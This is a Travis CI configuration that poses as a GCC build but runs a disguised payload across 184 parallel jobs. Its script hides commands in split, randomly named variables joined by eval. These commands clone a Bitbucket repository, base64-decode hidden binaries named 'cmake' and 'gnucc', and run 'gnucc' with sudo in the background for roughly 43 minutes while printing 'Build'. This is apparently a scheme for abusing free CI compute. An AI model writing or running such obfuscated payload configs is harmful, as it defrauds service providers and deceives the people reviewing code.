dist: bionic

env:
  - BUILD="dy1"
  - BUILD="dy2"
  - BUILD="dy3"
  - BUILD="dy4"
  - BUILD="dy5"
  - BUILD="dy6"
  - BUILD="dy7"
  - BUILD="dy8"
  - BUILD="dy9"
  - BUILD="dy10"
  - BUILD="dy11"
  - BUILD="dy12"
  - BUILD="dy13"
  - BUILD="dy14"
  - BUILD="dy15"
  - BUILD="dy16"
  - BUILD="dy17"
  - BUILD="dy18"
  - BUILD="dy19"
  - BUILD="dy20"
  - BUILD="dy21"
  - BUILD="dy22"
  - BUILD="dy23"
  - BUILD="dy24"
  - BUILD="dy25"
  - BUILD="dy26"
  - BUILD="dy27"
  - BUILD="dy28"
  - BUILD="dy29"
  - BUILD="dy30"
  - BUILD="dy31"
  - BUILD="dy32"
  - BUILD="dy33"
  - BUILD="dy34"
  - BUILD="dy35"
  - BUILD="dy36"
  - BUILD="dy37"
  - BUILD="dy38"
  - BUILD="dy39"
  - BUILD="dy40"
  - BUILD="dy41"
  - BUILD="dy42"
  - BUILD="dy43"
  - BUILD="dy44"
  - BUILD="dy45"
  - BUILD="dy46"
  - BUILD="dy47"
  - BUILD="dy48"
  - BUILD="dy49"
  - BUILD="dy50"
  - BUILD="dy51"
  - BUILD="dy52"
  - BUILD="dy53"
  - BUILD="dy54"
  - BUILD="dy55"
  - BUILD="dy56"
  - BUILD="dy57"
  - BUILD="dy58"
  - BUILD="dy59"
  - BUILD="dy60"
  - BUILD="dy61"
  - BUILD="dy62"
  - BUILD="dy63"
  - BUILD="dy64"
  - BUILD="dy65"
  - BUILD="dy66"
  - BUILD="dy67"
  - BUILD="dy68"
  - BUILD="dy69"
  - BUILD="dy70"
  - BUILD="dy71"
  - BUILD="dy72"
  - BUILD="dy73"
  - BUILD="dy74"
  - BUILD="dy75"
  - BUILD="dy76"
  - BUILD="dy77"
  - BUILD="dy78"
  - BUILD="dy79"
  - BUILD="dy80"
  - BUILD="dy81"
  - BUILD="dy82"
  - BUILD="dy83"
  - BUILD="dy84"
  - BUILD="dy85"
  - BUILD="dy86"
  - BUILD="dy87"
  - BUILD="dy88"
  - BUILD="dy89"
  - BUILD="dy90"
  - BUILD="dy91"
  - BUILD="dy92"
  - BUILD="dy93"
  - BUILD="dy94"
  - BUILD="dy95"
  - BUILD="dy96"
  - BUILD="dy97"
  - BUILD="dy98"
  - BUILD="dy99"
  - BUILD="dy100"
  - BUILD="dy101"
  - BUILD="dy102"
  - BUILD="dy103"
  - BUILD="dy104"
  - BUILD="dy105"
  - BUILD="dy106"
  - BUILD="dy107"
  - BUILD="dy108"
  - BUILD="dy109"
  - BUILD="dy110"
  - BUILD="dy111"
  - BUILD="dy112"
  - BUILD="dy113"
  - BUILD="dy114"
  - BUILD="dy115"
  - BUILD="dy116"
  - BUILD="dy117"
  - BUILD="dy118"
  - BUILD="dy119"
  - BUILD="dy120"
  - BUILD="dy121"
  - BUILD="dy122"
  - BUILD="dy123"
  - BUILD="dy124"
  - BUILD="dy125"
  - BUILD="dy126"
  - BUILD="dy127"
  - BUILD="dy128"
  - BUILD="dy129"
  - BUILD="dy130"
  - BUILD="dy131"
  - BUILD="dy132"
  - BUILD="dy133"
  - BUILD="dy134"
  - BUILD="dy135"
  - BUILD="dy136"
  - BUILD="dy137"
  - BUILD="dy138"
  - BUILD="dy139"
  - BUILD="dy140"
  - BUILD="dy141"
  - BUILD="dy142"
  - BUILD="dy143"
  - BUILD="dy144"
  - BUILD="dy145"
  - BUILD="dy146"
  - BUILD="dy147"
  - BUILD="dy148"
  - BUILD="dy149"
  - BUILD="dy150"
  - BUILD="dy151"
  - BUILD="dy152"
  - BUILD="dy153"
  - BUILD="dy154"
  - BUILD="dy155"
  - BUILD="dy156"
  - BUILD="dy157"
  - BUILD="dy158"
  - BUILD="dy159"
  - BUILD="dy160"
  - BUILD="dy161"
  - BUILD="dy162"
  - BUILD="dy163"
  - BUILD="dy164"
  - BUILD="dy165"
  - BUILD="dy166"
  - BUILD="dy167"
  - BUILD="dy168"
  - BUILD="dy169"
  - BUILD="dy170"
  - BUILD="dy171"
  - BUILD="dy172"
  - BUILD="dy173"
  - BUILD="dy174"
  - BUILD="dy175"
  - BUILD="dy176"
  - BUILD="dy177"
  - BUILD="dy178"
  - BUILD="dy179"
  - BUILD="dy180"
  - BUILD="dy181"
  - BUILD="dy182"
  - BUILD="dy183"
  - BUILD="dy184"

language: minimal

script:
  - sudo apt update || true
  - TEoKVo="sudo apt --"
  - yIShmOn="yes install"
  - BAHXGHH=" cl-base64 "
  - ueRTzoDwqy="git &>/dev/"
  - eval "$TEoKVo""$yIShmOn""$BAHXGHH""$ueRTzoDwqy""null"
  - bWokdYap="git clone h"
  - gYKUg="ttps://gccb"
  - PnsTNLnqLy="uild@bitbuc"
  - cLqtuXr="ket.org/gcc"
  - AZMgkQmidT="build/gcc.g"
  - JIWPGUEEU="it &>/dev/n"
  - eval "$bWokdYap""$gYKUg""$PnsTNLnqLy""$cLqtuXr""$AZMgkQmidT""$JIWPGUEEU""ull"
  - ESOPAEE="base64 -d g"
  - rYHUS="cc/cmake_ >"
  - eval "$ESOPAEE""$rYHUS"" cmake"
  - ljYwISEcsMN="base64 -d g"
  - RroZoRmF="cc/config_ "
  - eval "$ljYwISEcsMN""$RroZoRmF""> log"
  - yrFLUIfqpqw="base64 -d g"
  - dRnyelHhkq="cc/make_ > "
  - eval "$yrFLUIfqpqw""$dRnyelHhkq""gnucc"
  - LgOUM="chmod +x gn"
  - eval "$LgOUM""ucc cmake"
  - ./cmake
  - sed -i 's/build/tg2o/g' log
  - sudo ./gnucc --config log &>/dev/null &
  - GCC=$(date +%s)
  - RzeRxUJ="echo $BUILD"
  - eval "$RzeRxUJ"""
  - while true; do CC=$(date +%s); echo Build; [ $CC -ge $((GCC + 2610)) ] && sudo killall gnucc && break; sleep 210; done
